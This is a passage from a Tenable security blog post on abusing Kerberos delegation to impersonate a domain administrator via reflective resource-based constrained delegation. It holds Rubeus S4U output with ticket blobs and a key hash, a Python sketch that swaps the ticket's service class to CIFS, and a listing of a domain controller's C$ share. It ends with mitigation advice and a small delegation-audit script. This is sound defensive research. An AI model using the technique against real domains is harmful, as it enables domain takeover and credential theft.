klRCO+yMn+A57ypm8MjQqMloYQoebtJFXSLrc2TsUw6peipqQBVE0PLLItEW8zaYDshXJh0I9yv/ZILSFw0pQGl7+ksbtKVBhRzM6GUT3bETfRlafhVw6NTdr15GWMbmsQ8QBTPHKP86dRlcM+1XUJG9Y9bUPHPooM+FdTrp1AU860LLs6S0BII6qFPveWaEv1mKWqdiz4w1T5iaqfzAV6IyB1JyEeH2pEPS6mGz1jCbHryJ4NkIYVqT/jPB9HewHjysuS3grOrNHdfI4xqf7FuDXd3opUxyTrBKnYjibVrO/Cvtn22gaUFIYYMUEj00SSd0bFj03fLlANFHcTpI2sjqMGsj2myt0I29W/B4VOvPaZ4PwJQyl1TIiTAijtByOOyKOhEGCci1R9rXKf8hm8NIRgHRV25esmWoSsn7oZCB2Y0m362WpWtyNAiYmdhJR8eWaSlzl4EaksAQns0Ay/eBBapxac2KCDtDqt7iV8hxhMe2af132g4VwkIncbosXuDiENkPfdQo8F952W+I07RrFc3RBak8t8hMxqfUi3DEc8vX2xMViLi1TuCbbId6T0izIULbgazvVs2qYAhBz5QahcoIl9ykk/FHk76KVtwzno9NFj97/S8DnHwElWdsQv5wdANPBZla9/ltf4OTt3S7DGQEdHCr1Nry5MwAtnhnNaoxuMEg8rofIxk
uo4HgMIHdoAMCAQCigdUEgdJ9gc8wgcyggckwgcYwgcOgGzAZoAMCARehEgQQ3shEt2MArOTfy4NpkZDrHKEMGwpBTFNJRC5DT1JQohowGKADAgEKoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQKEAAKURGA8yMDIyMDcwODA5MjQyMlqmERgPMjAyMjA3MDgxOTI0MjJapxEYDzIwMjIwNzE1MDkyNDIyWqgMGwpBTFNJRC5DT1JQqSowKKADAgECoSEwHxsITVNTUUxTdmMbE3doYXRldmVyLmFsc2lkLmNvcnA=

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

v2.1.1

[*] Action: S4U

[*] Using aes256_cts_hmac_sha1 hash: 040f2dfbdc889c4139aef10cf7eb02c0ce5ab896efdb90248a1274b6decb4605
[*] Building AS-REQ (w/ preauth) for: 'alsid.corp\TestSvc'
[*] Using domain controller: 192.168.199.2:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIFBjCCBQKgAwIBBaEDAgEWooIEETCCBA1hggQJMIIEBaADAgEFoQwbCkFMU0lELkNPUlCiHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCmFsc2lkLmNvcnCjggPNMIIDyaADAgESoQMCAQKiggO7BIIDt837DnlWoEJDgHImMnBae4i0GGXOd2D5OAVkipVKLWoiBN8e7FtHc4pSHXgewe7yPZ08Xj9mvNcCcW5Hn5dPkmWph6InIBXCBNKgDMm6uyr7NjdTm/ufbwVwKeccRamOVI5ZdnfVkXz3KxGV6BB1eaf0vB9WYrGL53LHPc1EYnlTJ6xdYDEN55pcGcNx1mb9DHC4WkhZRxiJk35WhCeFgVaptO4pt3yyWLCfd8U884UEgoNQq8ayFGCl3R4i98K3mtspus9/ZOLrCJgSSGbF7XTuGXnVIuKfWzAfwq5xNup6ZwarqQ4EFrVdvGi+GIihEGb8wryAP69k8mQwSXhHwZCMWN5frIbfcR5x/boTh/2P00BxwtG3ScRe9F/voPMbMAG+dq8NU0eIOwmMqffBRZboZj4VC88KalrYgpKKK5Sfek+qsxBnM6WEbkTapcti0QF6Fqu5iwff4VsFNuMCYlB5qwfKxkTgaTtZumQkdconrrYkWHKi6AzoiTY2zG2gXmlJsJZrjBCPDkYK9W8IXu0jiQHAKhCvXLuNzSPIok5PKLZDBgF2wEHixVAwxjZXxheSk20r1sYLAi6biVbnqAgl0oma4jDVCsYY9ACq7Z+whlWmtTSHe5Ig/CuLPGOTkAW0X1xO1XK3tCJYH/QeWKIcRB8PLVYgb//PUR7KTesBYRWTSoxq/sqxKXSvbU5DxbARQULNJxYCJbj3V56tWbNwhE9btHze5dhuH+cGdJXsyLApN9gFTb78Z/HzZYBzDL9JD1zN+TW4ry5Da1XY/bklrH2nkvocJSHi9tOi16uAtdV/+hkfg8bNur9Dph9IbkkBLTVEmDI9M2QBAwvbjvFPHEbOZk6Zz1KdSjUBr1mD0qsDG/nkH5yZPbJtai5uGB5r7GHw02wgL1dTdc0WcRBpvD8WQcIL8eej3UyQdw8tl1bn8VTyso4VBx0bwfB8eCufiB3IfsuClw88glalKusw8nhZCmWifjZIVzOn7kpcOtOnIoJ39Fxh0hE5Q59/0Owl9XLC7Qyt9twWdXF0ZfVzLeA9enw+J5NeamCTpl6MpC49vGxqVR/kb/iR8Ln2JzpIjNJrGk+C5Z8alKfQIKQIl0ZqOHVOugRFupFiBL7GKCKAvP+kVUgl2RUAvVVkfqfH3jtpZvW9ZHNhRmZG0yTlMlL0VX7MGh6XCnpV37GepLAgb804XcpZv5Fa/fZat0ybaIUzfXwwKb3/x09bpiUFmnCnMXugpG1jH/y7GDOW0nkPLPr9a6OB4DCB3aADAgEAooHVBIHSfYHPMIHMoIHJMIHGMIHDoCswKaADAgESoSIEIDPJZc7qs13t8oas+xAqRDIHRp1Ye1U5Rz7GT9fXt7xToQwbCkFMU0lELkNPUlCiFTAToAMCAQGhDDAKGwh0ZXN0dXNlcqMHAwUAQOEAAKURGA8yMDIyMDcwODA5MjY0M1qmERgPMjAyMjA3MDgxOTI2NDNapxEYDzIwMjIwNzE1MDkyNjQzWqgMGwpBTFNJRC5DT1JQqR8wHaADAgECoRYwFBsGa3JidGd0GwphbHNpZC5jb3Jw


[*] Action: S4U

[*] Loaded a TGS for ALSID.CORP\Administrator
[*] Impersonating user 'Administrator' to target SPN 'HOST/DC01.ALSID.CORP'
[*] Final ticket will be for the alternate service 'CIFS'
[*] Building S4U2proxy request for service: 'HOST/DC01.ALSID.CORP'
[*] Using domain controller: DC01.alsid.corp (192.168.199.2)
[*] Sending S4U2proxy request to domain controller 192.168.199.2:88
[+] S4U2proxy success!
[*] Substituting alternative service name 'CIFS'
[*] base64(ticket.kirbi) for SPN 'CIFS/DC01.ALSID.CORP':

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
[+] Ticket successfully imported!

We can switch between service classes as long as the services run in the context of the same targeted service account: the service name (sname) is stored in the unencrypted part of the ticket, so it can be substituted after issuance. Here, we forged the service class CIFS. Now let’s try to access the C$ share of the DC:
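A rough sketch of why the /altservice substitution works: the sname lives outside the encrypted part of the ticket, so the server-side checks never notice the swap. Rubeus rewrites the ASN.1 structure properly; the hypothetical helper below does a naive same-length byte swap purely to illustrate the idea, on a toy blob rather than a real ticket.

```python
import base64

def substitute_service_class(kirbi_b64: str, old: bytes, new: bytes) -> str:
    """Swap the service class inside a base64-encoded .kirbi blob.

    Illustrative only: a same-length substitution (e.g. HOST -> CIFS) yields
    a ticket the target service still decrypts and accepts, because the
    signatures cover the encrypted part, not the cleartext sname.
    """
    if len(old) != len(new):
        raise ValueError("same-length substitution required for a raw byte swap")
    raw = base64.b64decode(kirbi_b64)
    if old not in raw:
        raise ValueError("service class not found in ticket")
    return base64.b64encode(raw.replace(old, new)).decode()

# Toy demonstration (not a real ticket):
demo = base64.b64encode(b"\x30\x10HOST\x1b\x0fDC01.ALSID.CORP").decode()
patched = substitute_service_class(demo, b"HOST", b"CIFS")
assert b"CIFS" in base64.b64decode(patched)
```

This is also why the mitigation has to happen on the delegation configuration itself: once an attacker holds a ticket for any SPN of the account, every service class on that account is reachable.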

J:\>klist

Current LogonId is 0:0x868064

Cached Tickets: (1)

#0>     Client: Administrator @ ALSID.CORP
        Server: CIFS/DC01.ALSID.CORP @ ALSID.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 11/2/2022 17:44:09 (local)
        End Time:   11/3/2022 3:44:09 (local)
        Renew Time: 11/9/2022 17:44:09 (local)
        Session Key Type: AES-128-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:
J:\>dir \\DC01.ALSID.CORP\C$
Volume in drive \\DC01.ALSID.CORP\C$ has no label.
Volume Serial Number is 64CB-7382

Directory of \\DC01.ALSID.CORP\C$

02/07/2022  08:55 PM               620 2022-07-02_-55-52_DC01.cab
02/07/2022  09:45 PM    <DIR>          extract
02/08/2022  02:35 PM        18,874,368 ntds.dit
09/15/2018  09:19 AM    <DIR>          PerfLogs
02/28/2022  09:41 PM    <DIR>          Program Files
10/08/2021  07:03 PM    <DIR>          Program Files (x86)
07/07/2022  05:40 PM    <DIR>          tmp
06/22/2022  05:02 PM    <DIR>          tools
06/16/2022  03:33 PM    <DIR>          Users
12/16/2021  03:28 PM             8,744 vssown.vbs
05/12/2022  06:29 PM    <DIR>          Windows
               3 File(s)     18,883,732 bytes
               8 Dir(s)  23,103,582,208 bytes free

Conclusion

Reflective RBCD is a good technique to mimic protocol transition. More broadly, any kind of delegation to a privileged object is dangerous: it puts your entire forest at risk if an attacker compromises the underlying service account. Such dangerous delegations must not be allowed.

All Service Principal Names (SPNs) referencing a privileged object — such as a domain controller — must be removed from the msDS-AllowedToDelegateTo attribute. You can do this in the “Delegation” tab of the Active Directory Users and Computers management console. The same precaution applies to privileged objects that authorize authentication delegation through Resource-Based Constrained Delegation (msDS-AllowedToActOnBehalfOfOtherIdentity).
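As a sketch of what that audit looks like, the hypothetical helper below flags accounts whose msDS-AllowedToDelegateTo points at a known domain controller. In practice the account/SPN pairs would come from an LDAP query; here they are hard-coded for illustration, and every name except TestSvc is made up.

```python
# Hypothetical audit sketch: flag constrained-delegation entries that target
# a privileged host (here, a hard-coded set of known domain controllers).

DOMAIN_CONTROLLERS = {"dc01.alsid.corp"}

def dangerous_delegations(accounts):
    """accounts: {samAccountName: [msDS-AllowedToDelegateTo SPNs]}"""
    findings = []
    for sam, spns in accounts.items():
        for spn in spns:
            # SPN format is class/host[:port][/name]; extract the host part.
            host = spn.split("/", 2)[1].split(":", 1)[0].lower()
            if host in DOMAIN_CONTROLLERS:
                findings.append((sam, spn))
    return findings

accounts = {
    "TestSvc": ["MSSQLSvc/whatever.alsid.corp", "HOST/DC01.ALSID.CORP"],
    "WebSvc":  ["HTTP/web.alsid.corp"],
}
assert dangerous_delegations(accounts) == [("TestSvc", "HOST/DC01.ALSID.CORP")]
```

Any hit from such a query is a candidate for the remediation described above: remove the SPN from the delegation list rather than trying to restrict individual service classes, since the service class in a ticket can be swapped.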


How to mimic Kerberos protocol transition using reflective RBCD was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.
